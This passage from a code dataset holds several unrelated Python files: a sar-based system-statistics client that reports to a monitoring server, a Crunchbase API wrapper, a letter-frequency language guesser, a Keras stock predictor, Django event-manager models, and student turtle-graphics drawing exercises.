sar_swap_str[i][1]!="pswpin/s": if j>=1: sar_gather+=str(sar_swap_str[i][j]) sar_gather+=' ' return sar_gather ''' swap ''' # 采集交换区的相关数据 def gather_S(): sar_gather='' sar_swap_info=subprocess.Popen('sar -S 0', shell=True, stdout=subprocess.PIPE) out0, err0=sar_swap_info.communicate() sar_swap_str=out0.decode(encoding='utf-8', errors='ignore') lines=len(sar_swap_str.split('\n')) sar_swap_str=sar_swap_str.split('\n') for i in range(0,lines): count_r=len(sar_swap_str[i].split()) sar_swap_str[i]=sar_swap_str[i].split() if count_r==6: for j in range(0,count_r): try: sar_swap_str[i][j]=float(sar_swap_str[i][j]) except ValueError: sar_swap_str[i][j]=sar_swap_str[i][j] if sar_swap_str[i][1]!="kbswpfree": if j>=3 and j!=4: sar_gather+=str(sar_swap_str[i][j]) sar_gather+=' ' return sar_gather ''' 数据汇总 ''' def gather(): year,month,day,hour,minute,second=getDate() # 制作时间戳 timestamp=dt_stamp(year, month, day, hour, minute, second) sar_gather='' # sar_gather[1~10]: %usr %nice %sys %iowait %steal %irq %soft %guest %gnice %idle sar_gather+=gather_cpu() # sar_gather[11]: MHz sar_gather+=gather_cpuMHz() # sar_gether[12-20]:%memused %commit kbactive kbinact kbdirty kbanonpg kbstack kbpgtbl kbvmused # sar_gather[21-28]:pgpgin/s pgpgout/s fault/s majflt/s pgfree/s pgscank/s pgsteal/s %vmeff sar_gather+=gather_memory() # sar_gather[29-36]:tps rd_sec/s wr_sec/s avgrq-sz avgqu-sz await svctm %util sar_gather+=gather_disk() # sar_gather[37-53]:rxpck/s txpck/s rxkB/s txkB/s rxcmp/s txcmp/s rxmcst/s %ifutil rxerr/s txerr/s coll/s rxdrop/s txdrop/s txcarr/s rxfram/s rxfifo/s txfifo/s sar_gather+=gather_network() # sar_gather[54-59]: runq-sz plist-sz ldavg-1 ldavg-5 ldavg-15 blocked sar_gather+=gather_q() # sar_gather[60]:intr/s sar_gather+=gather_I() # sar_gather[61-62]:proc/s cswch/s sar_gather+=gather_w() # sar_gather[63-67]: tps rtps wtps bread/s bwrtn/s sar_gather+=gather_b() # sar_gather[68-69]:pswpin/s pswpout/s sar_gather+=gather_W() # sar_gather[70-71]: %swpused %swpcad sar_gather+=gather_S() # 在sar_gather输出的第一个符号前添加时间戳 sar_gather=str(timestamp)+' '+sar_gather return sar_gather #---------------------------------# # main函数 # #---------------------------------# if __name__ =="__main__": #----------socket通信部分---------- clientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print(clientSocket) # 服务端的IP和端口号等(!需要自己进行设定) host = socket.gethostname() IP = "192.168.10.101" host = IP port = 8080 buffer_size = 1024 address = (host, port) print(address) clientSocket.connect(address) print("连接服务器成功") print("等待服务端发送信息...") # 与服务端进行通信 while(1): infor = clientSocket.recv(1024) command=infor.decode("utf-8") print("从服务器接受到消息",command) print("开始输出sar 的cpu、memory、disk、network等信息") if command=="COLLECT": data=gather() # 将收集到的信息作为有一定顺序的字符串 information=data clientSocket.send(information.encode("utf-8")) # 关闭socket连接 clientSocket.close() # __END__OF__SAR_PY__ ```
{ "source": "2018sjain/crunchbase-investments", "score": 3 }
#### File: 2018sjain/crunchbase-investments/company.py ```python import requests import json from person import Person class Company: global user_key user_key = '' #input crunchbase API key def __init__(self, name, permalink, fund): self.name = name self.permalink = permalink self.fund = fund self.categories, self.location = self.self_populate() self.type = "COMPANY" self.team = self.gen_team() def get_name(self): return self.name def set_name(self, name): self.name = name def get_permalink(self): return self.permalink def set_permalink(self, permalink): self.permalink = permalink def get_fund(self): return self.fund def set_fund(self, fund): self.fund = fund def get_categories(self): return self.categories def set_categories(self, categories): self.categories = categories def get_location(self): return self.location def set_location(self, location): self.location = location def get_type(self): return self.type def set_type(self, types): self.type = types def get_team(self): return self.team def set_team(self, team): self.team = team def self_populate(self): location = "" data_loc = requests.get("https://api.crunchbase.com/v3/organizations/" + self.permalink + "/headquarters?user_key=" + user_key).json() try: location = data_loc['data']['items'][0]['properties']['region'] except IndexError as e: pass data_cat = requests.get("https://api.crunchbase.com/v3/organizations/" + self.permalink + "/categories?user_key=" + user_key).json() categories = [] temp_cat = data_cat['data']['items'] for item in temp_cat: categories.append(item['properties']['name']) return categories, location def gen_team(self): data_team = requests.get("https://api.crunchbase.com/v3/organizations/" + self.permalink + "/current_team?user_key=" + user_key).json() team = [] temp_team = data_team['data']['items'] for item in temp_team: permalink = item['relationships']['person']['properties']['permalink'] team.append(Person(permalink, self)) return team ```
{ "source": "2018sjain/pylingual", "score": 3 }
#### File: pylingual/assets/predict.py ```python import numpy as np import string import re # pulling respective letter data from 'data' folder en = [np.load('data/english_one.npy'), np.load('data/english_two.npy'), np.load('data/english_three.npy'), 'english'] es = [np.load('data/spanish_one.npy'), np.load('data/spanish_two.npy'), np.load('data/spanish_three.npy'), 'spanish'] fr = [np.load('data/french_one.npy'), np.load('data/french_two.npy'), np.load('data/french_three.npy'), 'french'] de = [np.load('data/german_one.npy'), np.load('data/german_two.npy'), np.load('data/german_three.npy'), 'german'] # converts input to letter characters def clean(word): return re.sub('[^a-zA-Z\n\.]', ' ', word.translate(str.maketrans('','',string.punctuation))) # converts character to corresponding number def num(letter): letter = letter.lower() if letter == ' ': return 0 return ord(letter) - 96 # converts array of values to percentages of each value def percents(vals): total = sum(vals) if total == 0: total = 1 percents = [round((var/total)*100, 2) for var in vals] return percents # pulls letter data from previous datasets def one_chance(letter, lang): return lang[0][num(letter)] def two_chance(letter_a, letter_b, lang): return lang[1][num(letter_a)][num(letter_b)] def three_chance(letter_a, letter_b, letter_c, lang): return lang[2][num(letter_a)][num(letter_b)][num(letter_c)] # calculates the structural similarity of inputted word to each respective language letter structure def calculate(user_input, lang, a, b, c): one_prob = 1 two_prob = 1 three_prob = 1 for letter in user_input: one_prob *= one_chance(letter, lang) for letter in range(len(user_input)-1): two_prob *= two_chance(user_input[letter], user_input[letter+1], lang) for letter in range(len(user_input)-2): three_prob *= three_chance(user_input[letter], user_input[letter+1], user_input[letter+2], lang) return (a*one_prob) + (b*two_prob) + (c*three_prob) # current user input and processing user_input = 'I went to the library.' user_input = clean(user_input.lower()) print('input: ' + user_input + '\n\n' + 'results:' ) results = [] languages = [en, es, fr, de] for lang in languages: # optimal weights: 2, 12, 4 prob = calculate(user_input, lang, 2, 12, 4) results.append((prob, lang[3])) sort = sorted(results, reverse = True, key=lambda tup: tup[0]) percents = percents([val[0] for val in sort]) for x in range (len(sort)): print(sort[x][1] + ": " + str(percents[x]) + '%') ```
{ "source": "2018sjain/stock-predictions", "score": 3 }
#### File: 2018sjain/stock-predictions/stock-predict.py ```python import requests import sys import numpy as np import tweepy import os from keras.models import Sequential from keras.layers import Dense from textblob import TextBlob consumer_key = "" comsumer_secret = "" access_token = "" access_secret = "" login = tweepy.OAuthHandler(consumer_key, comsumer_secret) login.set_access_token(access_token, access_secret) user = tweepy.API(login) file = 'historical.csv' def get_name(symbol): url = "http://d.yimg.com/autoc.finance.yahoo.com/autoc?query={}&region=1&lang=en".format(symbol) result = requests.get(url).json() for x in result['ResultSet']['Result']: if x['symbol'] == symbol: return x['name'] def sentiment(quote, num): tweet_list = user.search(get_name(quote), count = num) positive = 0 null = 0 for tweet in tweet_list: check = TextBlob(tweet.text).sentiment if check.subjectivity == 0: null += 1 next if check.polarity > 0: positive += 1 if positive > ((num - null)/2): return True def get_data(quote): url = 'http://www.google.com/finance/historical?q=NASDAQ%3A'+quote+'&output=csv' r = requests.get(url, stream = True) if r.status_code != 400: with open(file, 'wb') as fl: for line in r: fl.write(line) return True def predict(): data = [] with open(file) as f: for num, line in enumerate(f): if num != 0: data.append(float(line.split(',')[1])) data = np.array(data) def create_set(data): datax = [data[n+1] for n in range(len(data)-2)] return np.array(datax), data[2:] trainx, trainy = create_set(data) classifier = Sequential() classifier.add(Dense(8, input_dim = 1, activation = 'relu')) classifier.add(Dense(1)) classifier.compile(loss = 'mean_squared_error', optimizer = 'adam') classifier.fit(trainx, trainy, nb_epoch= 200, batch_size = 2, verbose = 2) prediction = classifier.predict(np.array([data[0]])) return 'from %s to %s' % (data[0], prediction[0][0]) quote = input('Enter stock quote: ').upper() if not get_data(quote): print ('ERROR, please re-run the script') print(predict()) if not sentiment(quote, num = 100): print ('This stock has bad sentiment') else: print ('This stock has good sentiment') os.remove(file) ```
{ "source": "201901407/woc3.0-eventmanager-DarshilParikh", "score": 2 }
#### File: EventManager/Home/models.py ```python from django.db import models import uuid, datetime from django.utils import timezone # Create your models here. class User(models.Model): user_id = models.CharField(max_length=100,default=uuid.uuid4) email = models.EmailField(max_length=100) name = models.CharField(max_length=100) password = models.CharField(max_length=250) def getUserDetails(self): return self.email class Event(models.Model): event_id = models.CharField(max_length=100,default=uuid.uuid4) event_name = models.CharField(max_length = 120) event_start = models.DateTimeField() event_end = models.DateTimeField() host_email = models.EmailField(max_length = 100) host_name = models.CharField(max_length = 100) event_description = models.CharField(max_length = 300) registration_deadline = models.DateTimeField(default=timezone.now) event_poster = models.URLField(max_length=150,default = '') def getEventDetails(self): return [self.event_name,self.event_start,self.event_end,self.host,self.event_description] class Participant(models.Model): pevent_id = models.CharField(max_length=100) participant_email = models.EmailField(max_length = 100) participant_name = models.CharField(max_length=100) participant_contactno = models.IntegerField() group_registration = models.BooleanField() no_of_members = models.IntegerField() ```
{ "source": "2019-20-TFG-Presencial-Febr/PruebaNetExtractor", "score": 3 }
#### File: src/Guiones/CrearDiccionario.py ```python import urllib from bs4 import BeautifulSoup class CrearDiccionario: """ Clase que crea un diccionario de manera automática Args: modusuario: instancia de la clase modelo """ def __init__(self, modusuario): self.mod = modusuario def obtenerPersPelicula(self, url): """ Método para crear un diccionario de personajes para un guion a partir de una url introducida por el usuario Args: url: string con la url introducida Return: formato: int que contiene 1 si la estructura del guion es correcta y 0 si no lo es """ lista = list() formato = 0 web = urllib.request.urlopen(url) html = BeautifulSoup(web.read(), "html.parser") for pers in html.find_all("b"): if(not len(pers) == 0): pn = pers.contents[0] pn = str(pn) pn = pn.strip() if (not '<' in pn and not '>' in pn and not 'EXT.' in pn and not 'INT.' in pn and not 'INT ' in pn and not 'EXT ' in pn and not '.' in pn and not ':' in pn and not ';' in pn and not '"' in pn and not '!' in pn and not '?' in pn and not ',' in pn and len(pn)<30 and not 'Genres' in pn and not 'Writers' in pn and not '_' in pn): if (not pn in lista): if(not pn == ''): lista.append(pn) self.mod.anadirPersonaje(pn,pn) if ('EXT. ' in pn or 'INT. ' in pn or 'INT ' in pn or 'EXT ' in pn): pers = pn.split(' ') for i in pers: if('EXT' == i or 'INT' == i or 'EXT.' == i or 'INT.' == i): formato = 1 return formato ``` #### File: src/LecturaFicheros/Lectorcsv.py ```python import csv class Lectorcsv: """ Clase para importar y exportar diccionarios de personajes Args: m: instancia de la clase modelo """ def __init__(self,m): self.__modelo = m def importDict(self, fichero): """ Metodo que importa un diccionario de personajes que tenga una estructura predeterminada Args: fichero: ruta al fichero csv a importar """ i = 0 x= True with open(fichero, newline='', encoding='utf-8') as csvfile: spamreader = csv.reader(csvfile, delimiter=',',skipinitialspace=True) for row in spamreader: if(x): x = False else: if (i%2 ==0): i+=1 actual = row[0] self.__modelo.anadirPersonaje(actual,actual) else: i+=1 for n in row: self.__modelo.anadirReferenciaPersonaje(actual,n) def exportDict(self, fichero): """ Metodo que exporta el diccionario de personajes actual a un fichero csv con una estructura igual a la de los ficheros de importación Args: fichero: ruta donde exportar el diccionario """ pers = self.__modelo.getPersonajes() with open(fichero, mode='w', newline='', encoding='utf-8') as csvfile: spamwriter = csv.writer(csvfile, delimiter=',') spamwriter.writerow('Diccionario') for persk in pers.keys(): spamwriter.writerow([persk]) spamwriter.writerow(pers[persk].getPersonaje().keys()) ```
{ "source": "2019342a/emoji-bot", "score": 2 }
#### File: 2019342a/emoji-bot/main.py ```python from src.bot import BotClient from src.constants import KEY def main(): """ Runs the bot. """ client = BotClient() client.run(KEY) if __name__ == "__main__": main() ```
{ "source": "2019342a/reporter", "score": 3 }
#### File: reporter/tests/test_utils.py ```python from unittest.mock import patch from .context import create_reporter from .context import format_args from .context import format_kwargs @patch("logging.Logger.addHandler") def test_create_reporter(mock_process): create_reporter() assert mock_process.called def test_format_args(): integers = [1, 2, 3] strings = ["a", "b", "c"] assert format_args(integers) == "args 1 2 3" assert format_args(strings) == "args a b c" def test_format_kwargs(): kwargs = {1: 2, 2: 3} assert format_kwargs({}) == "" assert format_kwargs(kwargs) == ", kwargs 1=2 2=3" ```
{ "source": "2019342a/solid-palm-tree", "score": 4 }
#### File: solid-palm-tree/src/parse.py ```python import csv SF_FILE = "data/sample_sfpd_incident_all.csv" def parse(raw_file, delimiter): """Parses a raw CSV file to a JSON-line object.""" parsed_data = [] opened_file = open(raw_file) csv_data = csv.reader(opened_file, delimiter=delimiter) fields = csv_data.next() for row in csv_data: parsed_data.append(dict(zip(fields, row))) opened_file.close() return parsed_data ```
{ "source": "2019342a/ubiquitous-octo-pancake", "score": 2 }
#### File: {{cookiecutter.app_name}}/tests/test_models.py ```python def test_basic(): assert 4 == 4 ```
{ "source": "2019-a-gr1-python/py-guevara-sanandres-juan-diego", "score": 3 }
#### File: py-guevara-sanandres-juan-diego/Deber_2_Rompecabezas/Jigsaw.py ```python import math import random import numpy as np import matplotlib.pyplot as plt ##import matplotlib.image as mpimg class Puzzle: def __init__(self): self.imagen = plt.imread('Z:/junt_/Pictures/Backgrounds/thanos.jpg') self.rows_croped_image_list = None self.rows_croped_image_array = None self.columns_croped_image_list = [] ##self.columns_croped_image_array = [] self.rows = 0 self.columns = 0 self.img = None def createJigsaw(self,dimensions): self.img = np.array(self.imagen) self.rows_croped_image_list = np.vsplit(self.img,int(dimensions[0])) random.shuffle(self.rows_croped_image_list) for i in range(0,int(dimensions[0])): self.columns_croped_image_list.append(np.hsplit(self.rows_croped_image_list[i],int(dimensions[1]))) random.shuffle(self.columns_croped_image_list[i]) self.rows_croped_image_list[i] = np.hstack(self.columns_croped_image_list[i]) self.rows_croped_image_array = np.vstack(self.rows_croped_image_list) plt.imshow(self.rows_croped_image_array) plt.show(block=False) def changePiece(self,pos_piece_A,pos_piece_B): pos_x_piece_A = math.ceil(pos_piece_A/self.columns) - 1 pos_y_piece_A = pos_piece_A - (pos_x_piece_A*self.columns) -1 pos_x_piece_B = math.ceil(pos_piece_B/self.columns) - 1 pos_y_piece_B = pos_piece_B - (pos_x_piece_B*self.columns) -1 list_aux_1 = self.columns_croped_image_list[pos_x_piece_A] piece_1 = list_aux_1[pos_y_piece_A] list_aux_2 = self.columns_croped_image_list[pos_x_piece_B] piece_2 = list_aux_2[pos_y_piece_B] list_aux_1[pos_y_piece_A] = piece_2 list_aux_2[pos_y_piece_B] = piece_1 self.rows_croped_image_list[pos_x_piece_A] = np.hstack(list_aux_1) self.rows_croped_image_list[pos_x_piece_B] = np.hstack(list_aux_2) self.rows_croped_image_array = np.vstack(self.rows_croped_image_list) plt.imshow(self.rows_croped_image_array) plt.show(block=False) def main(self): keyboard_entry = None plt.imshow(self.imagen) plt.show(block=False) entry = input("Ingrese en cuantas filas y columnas desea que esté dividido su rompecabezas. Ejemplo: 9,4\n") dimensions = entry.split(",") self.rows = int(dimensions[0]) self.columns = int(dimensions[1]) num_pieces = self.rows*self.columns self.createJigsaw(dimensions) print(f"Se han generado {num_pieces} piezas númeradas desde la esquina superior derecha") while keyboard_entry != 'q': if(np.array_equal(self.img,self.rows_croped_image_array)): print("Felicidades ganaste") break else: keyboard_entry = input("Ingrese las 2 piezas que quiere cambiar separadas por coma. Ejemplo: 12,1\nPresione q si desea salir\n") if(keyboard_entry != 'q'): pieces = keyboard_entry.split(",") piece_A = int(pieces[0]) piece_B = int(pieces[1]) if(1<=piece_A<=num_pieces and 1<=piece_B<=num_pieces): self.changePiece(piece_A,piece_B) else: print("Escribe bien") Puzzle().main() ```
{ "source": "2019CapstoneDesign/CD4_FastQuest", "score": 2 }
#### File: TT/api/models.py ```python from django.utils.timezone import now from django.db import models from django.contrib.auth.models import User from django.db.models.signals import post_save from django.dispatch import receiver import datetime class LargeCat(models.Model): lcat_name = models.CharField(db_column='Lcat_name', primary_key=True, max_length=50) # Field name made lowercase. class Meta: db_table = 'large_cat' def __str__(self): return self.lcat_name class Category(models.Model): cat_name = models.CharField(primary_key=True, max_length=50) lcat_name = models.ForeignKey(LargeCat, models.DO_NOTHING, db_column='Lcat_name', blank=True, null=True) # Field name made lowercase. activity_rate = models.IntegerField(blank=True, null=True) sociality_rate = models.IntegerField(blank=True, null=True) class Meta: db_table = 'category' def __str__(self): return self.cat_name class Activity(models.Model): act_id = models.AutoField(primary_key=True) title = models.CharField(max_length=100) category = models.ForeignKey(Category, models.DO_NOTHING, db_column='category') content = models.TextField(blank=True, null=True) longterm = models.CharField(max_length=1, blank=True, null=True) outside = models.CharField(max_length=1, blank=True, null=True) address = models.CharField(max_length=100, blank=True, null=True) latitude = models.FloatField(blank=True, null=True) longitude = models.FloatField(blank=True, null=True) class Meta: db_table = 'activity' def __str__(self): return '%s. %s' % (self.act_id, self.title) class Profile(models.Model): user = models.OneToOneField(User, on_delete=models.CASCADE) nickname = models.CharField(max_length=30, blank=True, null=True) score = models.IntegerField(default=0, blank=True, null=True) activity = models.IntegerField(blank=True, null=True) sociality = models.IntegerField(default=100, blank=True, null=True) gender = models.CharField(default='M', max_length=10, blank=True, null=True) age = models.IntegerField(blank=True, null=True) created = models.DateTimeField(default=now, blank=True, null=True) class Meta: db_table = 'profile' def __str__(self): return '%s %s' % (self.user.username, self.user.email) # return self.user.username @receiver(post_save, sender=User) def create_user_profile(sender, instance, created, **kwargs): if created: Profile.objects.create(user=instance) @receiver(post_save, sender=User) def save_user_profile(sender, instance, **kwargs): instance.profile.save() class Assemble(models.Model): title = models.CharField(max_length=50, blank=True, null=True) category = models.ForeignKey(Category, models.DO_NOTHING, blank=True, null=True) content = models.TextField(blank=True, null=True) time = models.DateTimeField(default=now, blank=True, null=True) photo = models.ImageField(default='default_image.jpeg') author = models.ForeignKey(Profile, models.DO_NOTHING, blank=True, null=True) class Meta: db_table = 'assemble' def __str__(self): return self.title class Feed(models.Model): act = models.ForeignKey(Activity, models.DO_NOTHING) title = models.CharField(max_length=50, blank=True, null=True) content = models.TextField(blank=True, null=True) time = models.DateTimeField(default=now, blank=True, null=True) author = models.ForeignKey(Profile, models.DO_NOTHING, blank=True, null=True) image = models.ImageField(default='default_image.jpeg') class Meta: db_table = 'feed' def __str__(self): return '%s. %s' % (self.act, self.title) class PreCat(models.Model): #id = models.AutoField(primary_key=True) user = models.ForeignKey(Profile, models.DO_NOTHING, db_column='user_id') cat_name = models.ForeignKey(Category, models.DO_NOTHING, db_column='cat_name') class Meta: db_table = 'pre_cat' unique_together = (('user', 'cat_name'),) def __str__(self): return '%s: %s' % (self.user, self.cat_name) class Takes(models.Model): user = models.ForeignKey(Profile, models.DO_NOTHING, db_column='userid') act = models.ForeignKey(Activity, models.DO_NOTHING) star = models.IntegerField(default=3, blank=True, null=True) date = models.DateField(default=datetime.date.today) class Meta: db_table = 'takes' unique_together = (('id', 'act', 'date'),) def __str__(self): return '%s. %s' % (self.user.user.username, self.act) class Challenge(models.Model): cat_name = models.CharField(max_length=50) act_name = models.CharField(max_length=50) content = models.TextField(blank=True, null=True) image = models.ImageField(default='default_image.jpeg') def __str__(self): return '%s. %s' % (self.cat_name, self.act_name) class LikeFeed(models.Model): user = models.ForeignKey(Profile, models.DO_NOTHING) feed = models.ForeignKey(Feed, models.DO_NOTHING) class Meta: db_table = 'likefeed' unique_together = (('id', 'feed'),) def __str__(self): return '%s. %s' % (self.user.user.username, self.feed) class LikeAssemble(models.Model): user = models.ForeignKey(Profile, models.DO_NOTHING) assemble = models.ForeignKey(Assemble, models.DO_NOTHING) class Meta: db_table = 'likeassemble' unique_together = (('id', 'assemble'),) def __str__(self): return '%s. %s' % (self.user.user.username, self.assemble) ```
{ "source": "2019-fall-csc-226/a02-loopy-turtles-loopy-languages-manalais-a02", "score": 4 }
#### File: 2019-fall-csc-226/a02-loopy-turtles-loopy-languages-manalais-a02/a02_manalais.py ```python import turtle def icecream_cone(cone): cone.penup() cone.pensize(3) cone.setpos(25, 25) cone.color('tan') cone.pendown() cone.fillcolor('tan') cone.begin_fill() cone.right(70) cone.forward(102) cone.left(70) cone.forward(40) cone.right(-75) cone.forward(100) cone.left(105) cone.forward(100) cone.end_fill() def icecream_circle(circle): circle.penup() circle.setpos(75, 100) circle.pensize(3) circle.color('pink') circle.pendown() circle.fillcolor('pink') circle.begin_fill() circle.circle(-52) circle.end_fill() def random0(random): random.penup() random.setpos(-45,40) random.pensize(6) random.color('blue') random.pendown() random.fillcolor('blue') random.begin_fill() for side in range(2): random.forward(60) random.right(90) random.forward(60) random.right(90) random.end_fill() def main(): wn = turtle.Screen() cone = turtle.Turtle() circle = turtle.Turtle() random = turtle.Turtle() icecream_cone(cone) icecream_circle(circle) random0(random) wn.exitonclick() main() ```
{ "source": "2019-fall-csc-226/a02-loopy-turtles-loopy-languages-sontayvicentej-a02", "score": 4 }
#### File: 2019-fall-csc-226/a02-loopy-turtles-loopy-languages-sontayvicentej-a02/a02_sontayvicentej.py ```python import turtle wn = turtle.Screen() jhonny = turtle.Turtle() another = turtle.Turtle() jhonny.color() def square(t, distance): """ Draws a square""" for k in ["red", "yellow", "orange", "blue"]: t.color(k) t.forward(distance) t.left(90) for i in range(3): jhonny.forward(80) jhonny.left(36) for i in range(3): jhonny.forward(80) jhonny.left(36) size = 15 for i in range(10): square(jhonny, 76) size = size+15 jhonny.forward(80) jhonny.left(36) wn.exitonclick() ```
{ "source": "2019-fall-csc-226/a03-master", "score": 3 }
#### File: 2019-fall-csc-226/a03-master/a03_barnwellj.py ```python import turtle sc = turtle.Screen() sc.bgcolor("#ADD8E6") ht = turtle.Turtle() ht.pensize(15) ht.penup() ht.setpos(-200, 0) ht.pendown() ht.speed(10) def draw_square(ht): ht.fillcolor("#FFFF33") ht.begin_fill() for a in range(4): #draws the main part of the house ht.fd(300) ht.right(90) ht.end_fill() pass def drawtriangle(ht): ht.fillcolor("#ff0000") ht.begin_fill() for t in range(3): #draws the roof of the house ht.fd(150) ht.left(120) ht.fd(150) ht.end_fill() def drawwindow(ht): ht.fillcolor("#0000FF") ht.begin_fill() for w in range(4): ht.fd(100) ht.right(90) ht.end_fill() pass def drawdoor(ht): ht.fillcolor("#D2691E") ht.begin_fill() ht.fd(50) ht.right(90) ht.forward(90) ht.right(90) ht.fd(100) ht.right(90) ht.fd(90) ht.right(90) ht.fd(80) ht.end_fill() ht.right(90) ht.penup() ht.fd(55) def drawgrass(ht): #Function to create grass underneath the house ht.setpos(-690, -315) ht.right(90) ht.pendown() ht.pencolor("#228B22") ht.fillcolor("#228B22") #Changes the fill color to green ht.begin_fill() ht.fd(1500) ht.right(90) ht.fd(30) ht.right(90) ht.fd(1500) ht.right(90) ht.fd(30) ht.end_fill() def stick(ht): ht.color("#000000") #setting color and pensize for the stick figure ht.pensize(5) ht.left(120) #draws the stick figure ht.fd(50) ht.right(120) ht.fd(55) ht.right(180) ht.fd(55) ht.right(30) ht.pendown() ht.fd(50) ht.right(45) ht.fd(50) ht.right(180) ht.fd(100) ht.left(180) ht.fd(50) ht.left(15) ht.fd(5) ht.circle(30) def message(ht): ht.setpos(70, -20) #tells turtle to write a message on the screen ht.color("#000000") style = ('Courier', 20, 'italic') ht.write("Hello, and Welcome to my Home!!!", font=style, ) def main(): drawtriangle(ht) #starts drawing the house, beginning with the roof ht.fd(150) ht.right(90) draw_square(ht) ht.fd(120) #draws the main part of the house, and sets position of turtle ht.right(90) ht.penup() ht.fd(40) ht.pendown() #positions the turtle and draws the window drawwindow(ht) ht.penup() ht.fd(120) ht.pendown() drawwindow(ht) #draws the second window ht.penup() ht.setpos(-200, -300) #postitions the turtle and draws a door ht.pendown() drawdoor(ht) drawgrass(ht) ht.penup() ht.right(90) ht.fd(1000) ht.left(90) ht.fd(10) ht.right(145) ht.pendown() stick(ht) ht.penup() ht.fd(50) message(ht) #draws grass below the house main() sc.exitonclick() ``` #### File: 2019-fall-csc-226/a03-master/a03_schweinsbergs.py ```python import turtle def CreateHead(turtle): """ Creates the head for the puppy we're making! :return: none """ turtle.penup() turtle.speed(0) turtle.setpos(100,-50) turtle.pendown() turtle.color("#bd9f60") turtle.shape('arrow') turtle.begin_fill() for head in range(4): turtle.left(90) turtle.forward(200) turtle.end_fill() def CreateEars(turtle): """ Creates the ears for the puppy we're making! :return: none """ turtle.penup() turtle.speed(0) turtle.setpos(100,150) turtle.pendown() turtle.color("#615232") turtle.shape('arrow') turtle.begin_fill() for ears in range(2): turtle.forward(100) turtle.right(90) turtle.forward(300) turtle.right(90) turtle.end_fill() turtle.penup() turtle.setpos(-200,150) turtle.pendown() turtle.begin_fill() for earstwo in range(2): turtle.forward(100) turtle.right(90) turtle.forward(300) turtle.right(90) turtle.end_fill() def DrawEyes(turtle): """ Gives eyes to the puppy we're drawing! :return: none """ turtle.penup() turtle.speed(0) turtle.color('light blue') turtle.shape('arrow') turtle.setpos(-70,100) turtle.pendown() turtle.begin_fill() for eyesone in range(4): turtle.forward(30) turtle.right(90) turtle.end_fill() turtle.penup() turtle.setpos(40,100) turtle.pendown() turtle.begin_fill() for eyestwo in range(4): turtle.forward(30) turtle.right(90) turtle.end_fill() turtle.penup() def DrawNose(turtle): turtle.penup() turtle.setpos(-15,40) turtle.shape('arrow') turtle.color('light pink') turtle.pendown() turtle.begin_fill() for nose in range(3): turtle.forward(30) turtle.left(-120) turtle.end_fill() def DrawMouth(turtle): """ Makes a mouth and tongue for our puppy! """ turtle.penup() turtle.color('black') turtle.setpos(-50,20) turtle.pendown() turtle.right(90) turtle.forward(30) turtle.left(90) turtle.forward(100) turtle.left(90) turtle.forward(30) turtle.penup() turtle.color('red') turtle.setpos(-20,-11) turtle.pendown() turtle.begin_fill() for tongue in range(2): turtle.right(90) turtle.forward(40) turtle.right(90) turtle.forward(90) turtle.penup() turtle.setpos(700,700) turtle.end_fill() def main(turtle): """ Calls all of the functions in order so that the puppy can be drawn! :return: none """ wn = turtle.Screen() wn.bgcolor('light green') CreateHead(turtle) CreateEars(turtle) DrawEyes(turtle) DrawNose(turtle) DrawMouth(turtle) wn.exitonclick() main(turtle) ```
{ "source": "2019-fall-csc-226/t03-boustrophedon-turtles-eubanksn-belainehi-t03", "score": 4 }
#### File: 2019-fall-csc-226/t03-boustrophedon-turtles-eubanksn-belainehi-t03/project.py ```python import turtle def boustrophedon(g): "'This function fills up the square in a bustrophedon pattern.'" #draws the inner filings g.penup() g.setpos(-170, 170) g.pendown() for w in range(45): g.color("yellow") g.speed(10) g.right(90) # side.forward(5) g.left(90) g.forward(440) g.right(90) g.forward(5) g.right(90) g.forward(440) g.left(90) g.forward(5) g.left(90) def square (side): "'This function draws the square. '" # draw square for i in range(2): side.forward(500) side.right(90) side.forward(500) side.right(90) def main(): "'This is where the two functions come together. "'' #Create a window wn = turtle.Screen() wn.bgcolor("white") #Create a turtle side = turtle.Turtle() side.penup() side.setpos(-200,200) side.pendown() side.pensize(30) #draw the insides square (side) boustrophedon (side) wn.exitonclick() main() ```
{ "source": "2019-fall-csc-226/t03-boustrophedon-turtles-maynardb_conceptanjolima_t3", "score": 4 }
#### File: 2019-fall-csc-226/t03-boustrophedon-turtles-maynardb_conceptanjolima_t3/t03_stub.py ```python import turtle def outside_square(t, l): """ creates a border square param t: a turtle object param l:the length of the square return: none """ for i in range(4): t.forward(l) t.left(90) # ... def draw_pattern(t, l, h): """ draw the pattern inside the border square param t: turtle input param l: length of the inside design param h: height of the design return: none """ for i in range(11): t.forward(l) t.left(90) t.forward(h) t.left(90) t.forward(l) t.right(90) t.forward(h) t.right(90) # ... def main(): """ sets up attributes and calls functions return: none """ # ... wn = turtle.Screen() scott = turtle.Turtle() scott.pensize(20) scott.penup() scott.setpos(250, 250) scott.left(180) scott.pendown() outside_square(scott, 500) # Function call to function_1 scott.penup() scott.setposition(230, 230) scott.pendown() scott.color("red") draw_pattern(scott, 460, 20) # Function call to function_2 scott.forward(460) scott.left(90) scott.forward(20) scott.left(90) scott.forward(460) wn.exitonclick() main() ```
{ "source": "2019-fall-csc-226/t03-boustrophedon-turtles-meadors-frank-t03", "score": 3 }
#### File: 2019-fall-csc-226/t03-boustrophedon-turtles-meadors-frank-t03/t03_stub.py ```python import turtle ################################################################################# # define functions to create a square using ################################################################################# def square_turtle(name, x, y, size): """ Creates a square of defined size. """ name.penup() name.goto(x, y) name.pendown() name.setheading(0) for side in range(4): name.forward(size) name.left(90) def squiggle_right(meadors): """ Uses turtle to fill a line left to right """ for cross_space in range(12): for first_arc in range(2): meadors.forward(20) meadors.right(90) for second_arc in range(2): meadors.forward(20) meadors.left(90) def squiggle_left(t): """ Uses Turtle to fill a line from right to left """ for cross_space in range(12): for first_arc in range(2): t.left(90) t.forward(20) for second_arc in range(2): t.right(90) t.forward(20) # ... def main(): """ Function Starts all the other functions Makes and fills a square """ wn = turtle.Screen() wn.bgcolor('black') meadors = turtle.Turtle() meadors.color('deep sky blue') meadors.pensize(20) meadors.speed(0) # Call function to make square and size it square_turtle(meadors, -260, -260, 520) # move turtle to fill start point meadors.penup() meadors.pencolor('green') meadors.goto(-240, -240) meadors.pendown() meadors.setheading(90) # call both squiggle functions to fill in area for fill in range(6): squiggle_right(meadors) meadors.forward(60) squiggle_left(meadors) meadors.forward(20) # ... # fill in last remaining line meadors.right(90) meadors.forward(480) wn.exitonclick() ############################################################################ # set up the screen and turtle, then let the main function do its things ############################################################################ main() ```
{ "source": "2019-fall-csc-226/t04-master", "score": 4 }
